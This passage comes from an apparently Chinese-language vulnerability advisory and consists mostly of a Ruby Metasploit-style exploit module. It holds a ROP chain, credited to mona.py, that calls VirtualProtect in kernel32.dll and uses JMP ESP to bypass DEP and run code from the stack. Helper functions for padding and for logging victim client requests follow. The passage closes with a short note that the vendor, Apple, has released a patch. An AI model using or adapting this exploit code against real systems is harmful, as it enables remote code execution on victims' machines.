def gimme_rop()
# thanx to mona.py :)
rop_chain = [
0x66c9a6c0, # POPAD / RET
# registers
0x66801044, # EDI: RET
0x7c801ad4, # ESI: VirtualProtect [kernel32.dll]
0x6697aa03, # EBP: JMP ESP
junk, # skipped
0x6c1703e8, # EBX: will become 0x3e8 after adding 0x93e90000 (dwSize)
0xffffffd6, # EDX: will become 0x40 after adding 0x6a (flNewProtect)
0x673650b0, # ECX: lpflOldProtect
0x90909090, # EAX: nops
# correct dwSize and flNewProtect
0x66b7de1b, # ADD EBX, 0x93E90000 / RET
0x66975c56, # ADD EDX, 0x6A / RET
# throw it on the stack
0x6684b5c6 # PUSHAD / RET
].pack("V*")
return rop_chain
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def status(req,cli,action)
print_status("Request for #{req.uri} from #{cli.peerhost}:#{cli.peerport}. #{action}")
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: